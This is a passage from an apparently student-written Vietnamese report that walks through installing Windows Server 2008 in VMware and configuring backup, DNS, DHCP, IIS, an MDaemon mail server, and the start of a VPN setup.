chấp nhận đƣợc. Sự lựa chọn của bạn của phƣơng tiện truyền thông sẽ phụ
thuộc vào yêu cầu cụ thể của bạn sao lƣu. Tùy thuộc vào ngân sách của bạn và
nhu cầu lƣu giữ dữ liệu của bạn, bất kỳ trong số này sẽ là một giải pháp chấp
nhận đƣợc. Hãy chắc chắn rằng bạn có ít nhất một bản sao lƣu hàng tuần theo
lịch trình, mặc dù hàng ngày sẽ tốt hơn.

12
2.2.2.2 Giới thiệu về Windows Server 2008
Window Server 2008 là hệ điều hành Windows Server tân tiến nhất cho tới
thời điểm này, đƣợc thiết kế nhằm tăng sức mạnh cho các mạng, ứng dụng và
dịch vụ Web thế hệ mới. Với Windows Server 2008, bạn có thể phát triển,
cung cấp và quản lý các trải nghiệm ngƣời dùng và ứng dụng phong phú, đem
tới một hạ tầng mạng có tính bảo mật cao, và tăng cƣờng hiệu quả về mặt
công nghệ và giá trị trong phạm vi tổ chức của mình.
Windows Server 2008 kế thừa những thành công và thế mạnh của các hệ điều
hành Windows Server thế hệ trƣớc, đồng thời đem tới tính năng mới có giá trị
và những cải tiến mạnh mẽ cho hệ điều hành cơ sở này. Công cụ Web mới,
công nghệ ảo hóa, tính bảo mật tăng cƣờng và các tiện ích quản lý giúp tiết
kiệm thời gian, giảm bớt các chi phí, và đem tới một nền tảng vững chắc cho
hạ tầng Công nghệ Thông tin (CNTT) của bạn.
Nền tảng chắc chắn dành cho doanh nghiệp
Windows Server 2008 đem tới một nền tảng chắc chắn đáp ứng tất cả các yêu
cầu về ứng dụng và chế độ làm việc cho máy chủ, đồng thời dễ triển khai và
quản lý. Thành phần mới Server Manager cung cấp một console quản lý hợp
nhất, đơn giản hóa và sắp xếp một cách hợp lý việc cài đặt, cấu hình và quản
lý liên tục cho máy chủ. Windows PowerShell, một shell mới kiểu dòng lệnh,
giúp quản trị viên tự động hóa các tác vụ thƣờng trình về quản trị hệ thống
trên nhiều máy chủ. Windows Deployment Services đem tới một phƣơng tiện
bảo mật cao, đơn giản hóa để nhanh chóng triển khai hệ điều hành này qua các
bƣớc cài đặt trên nền mạng.Thêm vào đó, các wizard Failover Clustering của
Windows Server 2008, và việc hỗ trợ đầy đủ cho Giao thức Internet phiên bản
6 (gọi tắt là IPv6) cộng với khả năng quản lý hợp nhất Network Load
Balancing khiến dễ dàng triển khai với tính sẵn có cao, thậm chí bởi những
ngƣời có hiểu biết chung nhất về CNTT.
Tùy chọn cài đặt mới Server Core của Windows Server 2008 cho phép cài đặt
các vai trò máy chủ chỉ với những thành phần và hệ thống phụ cần thiết mà
không cần giao diện ngƣời dùng. Việc có ít hơn các vai trò và đặc tính đồng
nghĩa với việc giảm thiểu công việc cho ổ đĩa và dịch vụ, đồng thời giảm bớt
các bề mặt tấn công. Sản phẩm cũng cho phép nhân viên CNTT xây dựng đặc
tả tùy theo các vai trò máy chủ cần hỗ trợ.
Tích hợp Công nghệ Ảo hóa (Virtualization)
Windows Server Hyper-V, công nghệ ảo hóa thế hệ kế tiếp dành cho máy chủ
trên nền hypervisor, cho phép tận dụng tối đa các khoản đầu tƣ vào phần cứng
máy chủ bằng cách hợp nhất nhiều vai trò máy chủ thành các máy ảo riêng
biệt chạy trên một máy vật lý duy nhất. Cũng có thể chạy song song nhiều hệ
điều hành nhƣ Windows, Linux và các hệ điều hành khác một cách hiệu quả
trên một máy chủ duy nhất. Với Hyper – V và các chính sách cấp phép đơn

13
giản, giờ đây có thể tận dụng lợi thế của các khoản tiết kiệm chi phí và ảo hóa
một cách dễ dàng hơn bao giờ hết.
Hình 1.3 Mô hình ảo hóa
Nhờ các công nghệ truy cập ứng dụng tập trung của Windows Server 2008,
các ứng dụng cũng đƣợc ảo hóa một cách hiệu quả. Terminal Services
Gateway và Terminal Services RemoteApp cho phép dễ dàng truy cập từ xa
tới các chƣơng trình chuẩn hoạt động trên nền Windows từ bất cứ vị trí nào
bằng cách chạy chƣơng trình trên một máy chủ đầu cuối thay vì chạy trực tiếp
trên một máy trạm mà không cần tới một mạng riêng ảo (VPN) phức tạp.
Được xây dựng phục vụ Web
Windows Server 2008 xuất hiện với Internet Information Services 7.0 (IIS
7.0), một nền tảng máy chủ Web dễ sử dụng, tăng cƣờng bảo mật để phát triển
và lƣu trữ các ứng dụng và dịch vụ Web một cách tin cậy. Đặc tính nâng cao
quan trọng đối với nền tảng Web IIS 7.0 bao gồm một kiến trúc đƣợc thành
phần hóa để đem tới khả năng linh hoạt và kiểm soát cao hơn. II.7.0 cũng
cung cấp các khả năng quản lý đƣợc đơn giản hóa, khả năng khắc phục sự cố
mạnh mẽ, mang tính chẩn đoán giúp tiết kiệm thời gian và khả năng mở rộng
toàn diện.
Internet Information Server IIS 7.0 cùng với .NET Framework 3.0 cung cấp
một nền tảng toàn diện để xây dựng các ứng dụng kết nối ngƣời dùng và dữ
liệu, cho phép họ hình ảnh hóa, chia sẻ và thao tác thông tin. Thêm vào đó, IIS
7.0 còn đóng vai trò trung tâm trong việc hợp nhất các công nghệ nền tảng
Web của Microsoft – ASP.NET, các dịch vụ Web của Windows
Communication Foudation, và Windows Sharepoint Services.

14
Hình 1.4 Giao diện Internet Information Services (IIS) Manager
Bảo mật cao
Windows Server 2008 là hệ điều hành Windows Server bảo mật nhất từ trƣớc
đến giờ. Hệ điều hành này đã đƣợc củng cố chắc chắn để giúp bảo vệ chống
lại hỏng hóc. Một số công nghệ mới giúp ngăn chặn các kết nối bất hợp pháp
tới các mạng, máy chủ, dữ liệu của bạn và các tài khoản ngƣời dùng. Chức
năng Network Access Protection (NAP) giúp đảm bảo rằng những máy tính
nào muốn kết nối với mạng của bạn đều phải tuân thủ chính sách bảo mật của
tổ chức. Việc tích hợp công nghệ và nhiều tính năng nâng cao khiến các dịch
vụ Active Directory trở thành một giải pháp IDA (Identity and Access - Nhận
dạng và Truy cập) tích hợp, hợp nhất và mạnh mẽ. Thêm vào đó, Read-Only
Domain Controller (RODC) và Mã hóa ổ đĩa bằng BitLocker cho phép bạn
triển khai cơ sở dữ liệu AD một cách bảo mật hơn trên khắp các khu vực của
văn phòng chi nhánh.
Tính toán hiệu năng cao
Lợi ích và các khoản tiết kiệm chi phí của Windows Server 2008 mở rộng tới
Windows HPC Server 2008 để phục vụ cho môi trƣờng tính toán hiệu năng
cao (HPC) của bạn. Windows HPC Server 2008 đƣợc xây dựng trên nền
Windows Server 2008, công nghệ 64 bit và có thể mở rộng một cách hiệu quả
tới hàng nghìn lõi xử lý với tính năng có sẵn để cải thiện hiệu suất, và giảm
tính phức tạp của môi trƣờng HPC. Windows HPC Server 2008 cho phép triển
khai rộng rãi hơn bằng cách đem tới cho ngƣời dùng cuối những trải nghiệm
phong phú và tích hợp, mở rộng từ ứng dụng máy bàn tới các cụm máy, và

15
bao gồm một bộ trọn vẹn các công cụ triển khai, quản trị và giám sát. Các
công cụ này dễ triển khai, quản lý và tích hợp với hạ tầng CNTT hiện có của
bạn.
2.3 Các công nghệ được tiếp xúc, quá trình làm việc và các kiến thức
2.3.1 Làm việc với Windows Server 2008 trên môi trường máy ảo VMWare
Hình 2.1 VMware Workstation 10
VMWare WorkStation là một phần mềm giúp tạo máy ảo.
- Chạy các ứng dụng trên nhiều hệ điều hành bao gồm cả Linux, Windows và
nhiều hơn nữa cùng một lúc trên cùng một máy tính mà không cần khởi động
lại.
- Giúp đánh giá và kiểm tra hệ điều hành mới, các ứng dụng và các bản vá lỗi
trong một môi trƣờng bị cô lập.
- Củng cố nhiều máy tính chạy các máy chủ web, máy chủ cơ sở dữ liệu, vv vào
một máy tính duy nhất.

16
- Xây dựng kiến trúc tham khảo để đánh giá trƣớc khi triển khai vào sản xuất.
Nhƣ việc trong khi thực hành về máy Windows Server 2008 trên máy ảo để
nghiên cứu trƣớc khi triển khai trên hệ thống thật.
2.3.1.1.1 Cài đặt và cấu hình máy chủ Windows Server 2008
Xácđịnh yêu cầu phần cứng:
Hình 2.3.1.1.1 Cấu hình cài đặt Windows Server 2008.
Các bƣớc cài đặt Windows Server 2008 (cài đặt trên môi trƣờng
máyảoVMware Workstation)
Mở máyảoVMware
Workstation

17
Click File  New
Vitual Machine…
Xuất hiện hộp
thoại New Vitual
Machine Wizard
 Click Next>.

18
Click Installer disc
image file (iso) nếu
có file ISO và click
Browse..chọn
đƣờng dẫn đến nơi
chƣa file ISO.Nếu
cóđĩa Win Server
2008 thì chon
Installer disc.
Nhập Windows
Product key hoặcđể
trống rồi Click
Next>

19
Chọn Location nơi
Windows Server sẽ
càiđặt vào nơi nào
trong ổđĩa.
Click Next>
Nhập dung
lƣợngổđĩa vàoô
maximum disk size
khuyến nghị là 40
GB
Click Next>

20
Click Finish để tiến
hành càiđặt.
Chọn ngôn ngữ
càiđặt và click
Next.

21
Bấm nút Install
now để bắt đầu cài
đặt.
Nhập product key
của phiên bản
Windows Server
2008 Enterprise
Nếu chƣa muốn
kích hoạt Windows
vì mục đích kiểm
tra hoặc dùng thử,
bạn bỏ dấu chọn ở
mục Automaticall
yactivate
Windows then
I’m online và bấm
nút Next.

22
Chọn kiểu cài
đặt Windows
Server 2008
Enterprise (Full
Installation).
Chọn I accept the
license terms và
bấm nút Next.

23
Chọn Custom
(advanced)
Chọn phân
vùngổđĩa cần cài
Windows Server
2008 và click
Next.

24
Chờ cho quá trình
càiđặt hoàn tất.
Trong lần đăng
nhập đầu tiên, hệ
thống yêu cầu bạn
thay đổi mật khẩu
ngay lập tức

25
Bạn bấm OK,
nhập mật khẩu mới
và bấm
phím Enter.
Và nhƣ vậy bạn đã
cài đặt hoàn tất
Windows Server
2008.
2.3.1.1.2 Khởi tạo cấu hình lần đầu tiên cho Windows Server 2008
Ngay khi bạn đăng nhập thành công, hệ thống hiển thị màn hình yêu cầu
thực hiện các thao tác cầu hình ban đầu cho Windows (Initial Configuration
Tasks). Trong đó bao gồm :
• Set time zone : thiết lập time zone cho server.
• Configure networking : thiết lập các thông số kết nối mạng bằng cách mở
cửa sổ Network Connections và tƣơng tác với các kết nối hiện có trên server.
• Provide computer name and domain : mở hộp hội thoại System
Properties để thay đổi tên máy tính và kết nối vào domain.
• Enable automatic updating and feedback : kích hoạt tính năng này để cho
phép bạn cấu hình Windows automatic updating, Windows Error Reporting và
Customer Experience Improvement Program.

26
Hình 2.3.1.1.1Màn hình Initial Configuration Task
Hình 2.3.1.1.2 Kích hoạt tính năng automatic updating and feedback

27
Cài đặt Server Manager
Ngay khi bạn kết thúc các bƣớc cấu hình và đóng màn hình Initial
Configuration Tasks, màn hìnhServer Manager tự động đƣợc kích hoạt. Tại
đây, bạn có thể thực hiện hầu hết các thao tác cấu hình trên server.
Hình 2.3.1.1.3Màn hình chính của Server Manager
Server Manager là một công cụ che phép bạn thực hiện hầu hết các thao tác
quản trị trên Windows Server 2008, từ các dịch vụ server nhƣ Active
Directory, DNS, DHCP, … đến các thành phần của hệ thống nhƣ .NET
Framework 3.0, Network Load Balancing, Group Policy Management, … ; từ
hệ thống firewall, quản lý user và group đến các dịch vụ sao lƣu hệ thống,
quản lý đĩa…
Có thể nói rằng công cụ này là kết quả của sự kết hợp hòan hảo các công cụ
quản lý trên những phiên bản Windows trƣớc đó.

28
Theo mặc định, Server Manager sẽ tự động khởi động ngay sau khi bạn
đăng nhập vào hệ thống. Nếu đã đóng cửa sổ này, bạn có thể thực hiện một
trong những cách sau để mở lại :
• Kích chuột phải vào biểu tƣợng Computer trên desktop, chọn Manage.
Các thành phần trong Server Manager
Khi làm việc với Server Manager, bạn sẽ tƣơng tác với 5 thành phần chính :
• Roles cho phép bổ sung và loại bỏ các dịch vụ của server. Tại đây bạn
cũng có thể quản lý chi tiết dữ liệu tƣơng ứng với mỗi dịch vụ.
• Features cho phép bổ sung và loại bỏ các thành phần trên Windows
Server 2008. Chức năng này tƣơng tự nhƣ Add/Remove Windows
Components trong các phiên bản Windows trƣớc đó.
• Diagnostics tích hợp các thành phần Event Viewer, Reliability and
Performance và Device Manager.
• Configuration bao gồm các công cụ Local Users And Group, Task
Scheduler, Windows Firewall with Advanced Security, WMI
Control và Services. WMI Control đƣợc dùng để quản lý các dịch vụ
Windows Management Instrumentation.
• Storage tích hợp hai công cụ Windows Server Backup và Disk
Management.

29
Hình 2.3.1.1.4 Quản lý chi tiết trên Active Directory Users and Computer.
Quản lý các dịch vụ Server (Roles)
Để mở các cửa sổ quản lý các dịch vụ server, bạn chọn mục Roles ở khung
bên trái của màn hình Server Manager. Trên Windows Server 2008 nói
chung, bạn có thể triển khai tất cả 16 dịch vụ server, từ Active Directory
Domain Services đến các server nhƣ DHCP, DNS, Web, …
Lưu ý : ngoài 16 dịch vụ server có mặt trên tất cả các phiên bản Windows
Server 2008, Microsoft còn cung cấp một dịch vụ server nữa, đó là Hyper-V.
Hyper-V là công nghệ ảo hóa chỉ chạy trên các nền tảng hệ điều hành 64-bit.
Để cài đặt một dịch vụ server bất kỳ, bạn đánh dấu chọn vào ô tƣơng ứng
trên hộp thoại Select Server Roles. Tiếp theo, bấm nút Install để bắt đầu.
Trong tiến trình cài đặt, tùy theo đặc điểm riêng của từng dịch vụ server, bạn
sẽ điền thông tin và thực hiện các thao tác cần thiết để hoàn thành tiến trình.

30
Hình 2.3.1.1.5 Các dịch vụ Server trên Windows Server 2008
Quản lý các thành phần (Features)
Để mở cửa sổ quản lý các thành phần, bạn chọn mục Features ở khung bên
trái của màn hình Server Manager. Trên Windows Server 2008 bạn có thể
tƣơng tác với tất cả 35 thành phần.
Để cài đặt một thành phần bất kỳ, bạn đánh dấu chọn vào ô tƣơng ứng trên
hộp thoại Select Features. Tiếp theo, bấm nút Install để bắt đầu. Trong tiến
trình cài đặt, tùy theo đặc điểm riêng của từng thành phần, bạn sẽ điền thông
tin và thực hiện các thao tác cần thiết để hoàn thành tiến trình.

31
Hình2.7 :Các thành phần Feature trên Windows Server 2008.
Sau khi cài đặt xong, thông tin và trạng thái của các thành phần sẽ hiển thị
trong khung Features Summary thuộc cửa sổ Server Manager. Tại đây, bạn
cũng có thể thực hiện các thao tác bổ sung và loại bỏ các thành phần này.
Quản lý không gian lƣu trữ và sao lƣu dữ liệu (Storage) và Backup Server.
Mặc định, Windows Server Backup chƣa sẵn dùng trên Windows Server 2008.
Do đó, bạn cần bổ sung thành phần này vào hệ thống trƣớc khi sử dụng. Các
bƣớc thực hiện nhƣ sau :
Trong cửa sổ Server
Manager, ở
khung Feature
Summary, bạn
chọn Add Features.

32
Trong màn
hình Select Features,
đánh dấu chọn
mục Windows
Server Backup
Features và bấm
nút Next.
Trong màn
hình Confirm
Insatallation
Selection, bạn bấm
nút Install để bắt đầu
cài đặt.
Trong màn
hình Installation
Results, bạn bấm
nút Close để hoàn
thành thao tác bổ
sung thành phần cần
thiết vào Windows
Server 2008.

33
Kích chuột phải lênh
mục Windows
Server
Backup trong Storag
e, chọn Backup
Schedule.
Trong màn
hình Getting started,
bấm nút Next.

34
Trong màn
hình Select backup
items, bạn chọn ổ đĩa
chứa hệ điều hành
của mình, trong
trƣờng hợp này là ổ
đĩa C: và bấm
nút Next
Trong màn
hình Specify backup
time, bạn chọn số lần
và thời điểm sao lƣu.
Ở đây, chúng ta chọn
sao lƣu vào lúc 10:00
tối mổi ngày (Once a
day). Sau khi chọn
xong, bạn bấm
nút Next.
Trong màn
hình Select
destination disk, bạn
đánh dấu chọn vào ổ
đĩa mà mình sẽ sao
lƣu đến và bấm
nút Next

35
Trong màn
hình Label
destination disk,
bấm nút Next.
Trong màn
hình Summary, bạn
bấm nút Finish để
hoàn thành thao tác
tạo lịch trình sao lƣu
ổ đĩa
2.3.1.1.3 Cài đặt dịch vụ DNS
DNS (Domain Name System) Server là máy chủ đƣợc dùng để phân
giải domain thành địa chỉ IP và ngƣợc lại. Ví dụ: athena.edu.vn là
173.214.177.90
Về cách thức hoạt động, DNS Server lƣu trữ một cơ sở dữ liệu bao
gồm các bản ghi DNS và dịch vụ lắng nghe các yêu cầu.Khi máy
client gửi yêu cầu phân giải đến, DNS Server tiến hành tra cứu trong
cơ sở dữ liệu và gửi kết quả tƣơng ứng về máy client.

36
Tại cửa sổ Server
Manager, chọn mục
Roles, chọn mục Add
Roles.
Chọn DNS và click Next.

37
Click Next
Click Install để cài đặt
DNS

38
Quá trình cài đặt hoàn
tất.
Để cấu hình DNS Server
vào
menu StartProgramsA
dministrative Tools,
chọnDNS.
Forward Lookup
Zones, chọn New Zone.

39
Trong màn hình
Welcome, bấm nút Next.
Trong màn hình Zone
Type, bạn chọn Primary
zone để cấu hình DNS
Server chính. Sau đó,
bấm nútNext.

40
Name, bạn nhập tên zone
vào mục Zone name, ví
dụ thuvien-it.net. Sau đó,
bấm nút Next
Trong màn hình Zonle
File, bạn chấp nhận giá
trị mặc định và bấm
nút Next.
Để mặc định và click
Next

41
Trong màn hình
Completing, bạn xem lại
thông tin về DNS Server
và bấm nút Finish để
hoàn thành thao tác cấu
hình DNS.
Với các bƣớc vừa thực
hiện ở trên, bạn đã cấu
hình chức
năng forward, tiếp theo,
bạn sẽ cấu hình chức
năng reverse. Reverse
Lookup Zones,
chọn New Zone

42
Trong màn hình
Welcome, bấm nút Next.
Type, bạn
chọn Primary.Sau đó,
bấm nút Next.
Trong màn hình Reverse
Lookup Zone Name, bạn
chọn thể loại địa chỉ IP
là Ipv4

43
Tiếp theo, bạn
điền network IP của
mình và bấm nút Next.
File, bạn chấp nhận giá
trị mặc định nhằm tạo ra
một file dùng để lƣu các
bản ghi DNS cho zone
này, bấm nút Next.

44
Trong màn hình
Dynamic Update, bạn
chọn allow dynamic
updates và bấm
nút Next
Trong màn hình
Completing, bạn bấm
nút Finish để hòan thành
thao tác cấu hình chức
năng reverse trên DNS
Server chính.
Cấu hình host đại diện
dùng để phân giải tên ra
số.

45
Mục name nhập www và
mục IP address nhập địa
chỉ Ip máy Server. Và
Click Add host.
Để kiểm tra và start 
cmd và gõ lệnh
nslookup.
Tạo Pointer đại diện tên
1 host có sẵn để phân
giải tên ra IP.

46
Trong hộp thoại New
Resource Record, bạn
nhập địa chỉ IP vào mục
Host IP address, đồng
thời nhập tên máy vào
mục Host name. Nếu
không nhớ, bạn bấm
nút Browse để tìm ra tên
máy cần thiết. Sau khi
điền xong, bấm nút OK.
Sau khi Click Browse…
Click OK.
2.3.1.1.4 Dịch Vụ DHCP
DHCP (Dynamic Host Configuration Protocol) Server là máy chủ đƣợc
dùng để cấp phát địa chỉ IP động cho các máy trạm trong một hệ thống
mạng. Trên các phiên bản trƣớc nhƣ Windows 2000 Server hay
Windows Server 2003, bạn đã quen thuộc với chức năng này.
Về cách thức hoạt động, DHCP Server sử dụng dịch vụ cùng tên để
lắng nghe yêu cầu xin cấp phát địa chỉ IP đƣợc gởi từ máy trạm. Sau

47
khi nhận yêu cầu, DHCP Server sẽ chọn ra một địa chỉ IP trong dãy địa
chỉ của mình và gời về cho máy trạm. Đồng thời, DHCP Server cũng
gởi đến máy trạm các thông tin liên quan đến địa chỉ IP nhƣ subnet
mask, địa chỉ IP của các DNS Server, default gateway, …Đối với
Windows Server 2008, cách thức cài đặt và cấu hình đƣợc mô tả chi tiết
ngay sau đây.
Mở cửa sổ Server
Manager. Trong
khung Roles
Summary ở bên
phải, bạn bấm
nút Add Roles

48
Chọn dịch vụ DHCP
và click Next
Click Next

49
Chọn card mạng
lắng nghe yêu cầu
xin cấp DHCP và
click Next>
Nhập thông tin về
domain và các DNS
Server sau đó click
Next.

50
Trong màn hình
Specify Ipv4 WINS
Server Settings, bạn
chọn WINS is not
required for
applications on this
network. Sau đó
click Next.
Trong màn hình Add
or Edit DHCP
Scopes, bấm
nút Add. Và điền
các thông tin cần
thiết. và click OK.

51
Sau khi hoàn thành
việc định nghĩa các
dãy địa chỉ, bạn bấm
nút Next trong màn
hình Add or Edit
DHCP Scopes
Trong màn hình
Configure DHCPv6
Stateless Mode, bạn
chọn Disable
DHCPv6 stateless
mode for this
server.

52
Trong màn hình
Authorize DHCP
Server, bạn chọn tài
khoản dùng để cấp
phép (authorizing)
cho DHCP Server
trong Active
Directory Domain
Services. Sau đó,
bấm nút Next.
Trong màn hình
Confirm Installation
Selections, bạn xem
lại các thiết lập vừa
thực hiện và bấm
nútInstall để bắt đầu
cài đặt.
Nhƣ vậy chúng ta đã
hoàn tất quá trình
cài đặt và cấu hình
dịch vụ DHCP.

53
Đến đây, DHCP đã
sẵn sàng cung cấp
địa chỉ IP cho các
máy trạm trong hệ
thống mạng. Nếu
muốn hiệu chỉnh các
thông số cấu hình,
bạn thực hiện theo
các bƣớc sau:vào
menu Start/Progra
ms/Administrative
Tools, chọn DHCP.
Mở rộng mục IPv4,
kích chuột phải vào
dòng Scope
[172.16.0.0],
chọn Properties

54
Trên tab General,
bạn có thể thay đổi
các giá trị Scope
name, Start IP
address, End IP
address, giới hạn
thời gian địa chỉ IP
tồn tại trên máy
trạm.
Để thay đổi
gateway, bạn kích
chuột phải lên
mục 003
Router trong Scope
Options,
chọnProperties.

55
Thay đổi giá trị
gateway bằng các
chức
năng Add và Remo
ve.
Để thay đổi địa chỉ
các DNS Server, bạn
kích chuột phải lên
mục 006 DNS
Servers trong Serve
r Options,
chọn Properties.

56
Thay đổi địa chỉ của
DNS Server bằng
chức
năng Add và Remo
ve.
Để thay đổi tên
miền, bạn kích chuột
phải lên mục 015
DNS Domain
Name trong Server
Options,
chọn Properties.

57
Nhập tên miền mới
vào mục String
value.
Cấu hình địa chỉ IP
động trên máy trạm
bạn mở cửa sổ
Network
Connections và truy
cập vào hộp thoại
Internet Protocol
(TCP/IP) Properties.
Tại đây, bạn
chọn Obtain an IP
address
automatically và
Obtain DNS server
address
automatically. Sau
đó, bấm nút OK

58
Trên máy trạm lệnh
xin cấp địa chỉ
DHCP bằng cách
vào Start  Run 
gõ cmd  enter.
Gõ lệnh ipconfig
/renew.
Để xin trả lại địa chỉ
IP mà DHCP đã cấp
gõ lệnh ipconfig /
release.
Nhƣ vậy chúng ta đã hoàn thành việc cấp địa chỉ IP động bằng dịch vụ
DHCP.
2.3.1.1.5 Cấu hình Web Server IIS.

59
Mở cửa sổ Server
Manager. Trong
khung Roles
Summary ở bên
phải, bạn bấm Add
Roles.
Trong màn hình
Select Server
Roles, chọn Web
Server (IIS)

60
Trong hộp thoại
Add features
required for Web
Server (IIS), bạn
bấm nút Add
Required
Featuresđể bổ
sung các thành
phần liên quan đến
Web Server.
Trong màn hình
Select Server
Roles, bấm
nút Next.

61
Chọn lựa các thành
phần bổ sung vào
Web Server.
Trong màn hình
Confirm
Installation
Selections, bạn
xem lại các thiết
lập vừa thực hiện
và bấm
nútInstall để bắt
đầu cài đặt.

62
Sau khi cài đặt
hoàn tất. Khi IIS
Manager xuất hiện,
bạn sẽ bắt gặp
ngay trang web đầu
tiên (IIS Start
Page). Tại đây, bạn
sẽ tìm thấy thông
tin về các kết nối
đến các Web
Server mình đã
quản lý trong thời
gian gần với hiện
tại.
Trong màn hình
Specify Server
Connection
Details, bạn nhập
địa chỉ IP của Web
Server cần quản lý
vào mục Server
name và bấm
nút Next.

63
Trong màn hình
Specify a
Connection Name,
bạn nhập tên kết
nối và bấm
nút Finish.
Để thay đổi các
thông số cấu hình
trên Web Server,
bạn kích chọn tên
kết nối tƣơng ứng
với Web Server ở
khung bên trái, sau
đó chọn mục cần
cầu hình ở khung
chính giữa.

64
Để kiểm tra Web
Server sau khi đã
cài đặt, bạn mở
trình duyệt và gõ
địa
chỉ http://localhos
t. Nếu màn hình
IIS 7 xuất hiện nhƣ
hình bên dƣới, thao
tác cài đặt và cấu
hình Web Server
của bạn đã thành
công.
Xuất bản một
website Mở cửa sổ
Internet
Information
Service (IIS)
Manager. Kích
chuột phải lên
mục Sites ở khung
bên trái, chọn Add
Web Site.

65
Trong hộp thoại
Add Web Site, bạn
điền thông tin :
Tên của website
vào mục Site name
Nhập đƣờng dẫn
đến thƣ mục chứa
mã nguồn của
website vào
mục Physical
path hoặc bấm vào
nút ba chấm (…)
để định đƣờng dẫn.
Nếu xuất bản
website với mã
nguồn chứa ở một
máy tính khác, bạn
cần bấm vào
nút Connect as và
chỉ định tài khoản
dùng để truy cập
thƣ mục ở xa
này.Nếu xuất bản
nhiều website, bạn
cần nhập tên truy
cập chính xác của
các website vào
mục Host name.

66
Ngay sau đó,
một thông báo xuất
hiện, cho biết cổng
80 đã đƣợc một
website khác sử
dụng (thông
thƣờng là Default
Web Site) Trong
trƣờng hợp này,
bạn cần kích
chọn Default Web
Site và bấm
nút Stop ở khung
bên phải để ngƣng
trạng thái hoạt
động của website
này. Đồng thời,
bạn chọn website
của mình và bấm
nút Start ở khung
bên phải để kích
hoạt trạng thái hoạt
động cho website
Đến nay, bạn đã
hoàn thành thao tác
xuất bản một
website. Nếu muốn
kiểm tra, bạn mở
trình duyệt và gõ
địa chỉ
http://localhost.
Ngay sau đó, nội
dung website của
bạn sẽ xuất hiện.
2.3.1.1.6 Mail Server

67
Hiện nay có rất nhiều phần mềm quản lý Mail trên Server nhƣ: Mail
Exchange,… nhƣng MDaemon Mail Server: là 1 trong những giải pháp
hệ thống mail server toàn diện nhất hiện nay dành cho các công ty,
doanh nghiệp với quy mô khác nhau. MDaemon Mail Server hiện có 3
phiên bản: Standard, Pro và Free. Sau đây là một số điểm đáng chú ý
của chƣơng trình.
Hình 2.3.1.1.6.1 Giao diện Mdeamon.
Màn hình hiển thị chính của MDaemon (Graphical User Interface - GUI) đƣa
ra thông tin quan trọng về các nguồn tài nguyên, các giao dịch, số liệu thống
kê, luồng dữ liệu đang trong trạng thái hoạt động (active) và các mail đang
trong quá trình chờ đợi (queued) để đƣợc xử lý. Bên cạnh đó, còn có sự lựa
chọn cho ngƣời dung chuyển đổi trạng thái activating/deactivating đối với các
hệ thống máy chủ khác nhau có sử dụng MDaemon. Cửa sổ bên phải hiển thị
đầy đủ thông tin về kết nối dữ liệu đầu vào và ra (incoming và outgoing) đang
đƣợc thực hiện.

68
Sau đây là quá trình cài đặt 1 Mail Server trên phần mềm Mdeamon.
Trƣớc tiên, bạn
tải phiên bản
MDaemon Mail
Server mới nhất
và bắt đầu quá
trình cài
đặt.Bấm "Next"
để tiếp tục.
Đánh dấu vào ô
"I have read and
I agree with all
the terms of this
license
agreement"

69
Chọn đƣờng dẫn
lƣu trữ của
chƣơng trình,
mặc định sẽ là ổ
C hệ thống (ổ đĩa
có cài hệ điều
hành Microsoft
Windows).
Lựa chọn phiên
bản cài đặt, nếu
bạn có key đăng
ký thì nhập vào ô
phía dƣới. Ở ví
dụ sử dụng là
phiên bản free
hoặc miễn phí 30
ngày của phiên
bản Pro.
Tùy chọn các
thông tim phù
hợp với vị trí, ở
đây là VietNam

70
Điền đúng thông
tin về quy mô của
tổ chức hoặc
công ty.
Sau khi hoàn tất
các bƣớc trên,
chọn "Next" để
bắt đầu cài đặt.
Chờ đợi cho quá
trình cài đặt hoàn
tất.

71
Điền tên Domain
chính xác ví
dụ:nguyendinhdu
y.tk
Điền địa chỉ DNS
chính (Primary)
và dự phòng
(Backup)
Giữ nguyên lựa
chọn "Setup
MDaemon as a
system service"

72
Bấm "Finish" để
kết thúc quá trình
cài đặt và cấu
hình ban đầu, bắt
đầu sử dụng
Giao diện sau khi
cài đặt thành
công.

73
Tạo 1 tài khoảng
mới vào Account
 New
Account…
Nhập thông tin
vào Email
address và Email
Password. Click
OK để tạo tài
khoảng Email.

74
Vào OutLook
Mail.
Cấu hình Out
Look mail để
quán lý mail cho
tài khoảng
test@nguyendinh
duy.tk. Nhập tên
hiện thị vào
Display name và
click Next>

75
Nhập địa chỉ
Email và Click
Next>
Nhập địa chỉ IP
vào 2 ô Incoming
và Outgoing và
click Next.

76
Nhập tên tài
khoảng và mật
khẩu. Click Next.
Click Finish để
hoàn tất cấu hình
quản lý mail cho
tài khoảng test.

77
Tạo mail để kiểm
ra việc gửi mail
từ tài khoảng test
đến 1 e mail bất
kỳ.
Vào mail đƣợc
gửi và kiểm tra
Mail.
Xem mail tu tài
khoảng
test@nguyendinh
duy.tk

78
Trả lời lại Mail
của tài khoảng
test@nguyendinh
duy.tk
Vào lại mail của
tài khoảng
test@nguyendinh
duy.tk và đã nhận
đƣợc hồi âm.
Nhƣ vậy chúng ta đã hoàn thành việc cài đặt và quản lý 1 mail Server trên
phần mềm Mdeamon.
2.3.1.1.7 Kết nối VPN

79
Việc triển khai một mạng riêng ảo có nhiều dịch vụ và chức năng cần
phải làm việc cùng nhau một cách trôi chảy và dễ dàng, vì vậy những
ngƣời dùng truy cập từ xa có thể đƣợc định danh và xác thực; các đƣợc
hầm có thể đƣợc tạo lập, duy trì và quản lý cho hàng trăm ngƣời dùng;
việc định tuyến có thể kiểm soát tất cả luồng lƣu lƣợng qua Gateway,
và trong khi tất các những thứ này đang tiếp tục, hiệu suất và sự an toàn
cần đƣợc duy trì.
Các thành phầm phải đƣợc cài đặt để tạo ra một hệ thống mạng riêng
ảo hoạt động đúng đắn. Để đƣa ra quyết định đúng lúc triển khai các
kết nối mạng riêng ảo truy cập từ xa, ta phải hiểu tất cả các thành phần
liên quan. Trong chƣơng "Tổng quan về mạng riêng ảo" chúng ta đã
thảo luận về kiểu kịch bản mạng riêng ảo truy cập từ xa, trong đó nhiều
Client truy cập tới một cổng kết nối đơn vào các tài nguyên trong mạng
Intranet. Trong phần này ta sẽ mô tả các thành phần của các kết nối
mạng riêng ảo truy cập từ xa và các quan điểm thiết kế gắn với chúng.
Mô hình VPN Client to Site:
Hình 2.3.1.1.7.1 Mô hình VPN Client to Site.
Để cấu hình và thiết lập kết nối VPN Client to Site trải qua các bƣớc sau:

80
Đăng nhập
vào máy
chủ ảo VPS
với quyền
quản trị.
Vào Start

Programs

Administrat
ive Tools
 Routing
and remote
access để
cấu hình.

81
Giao diện
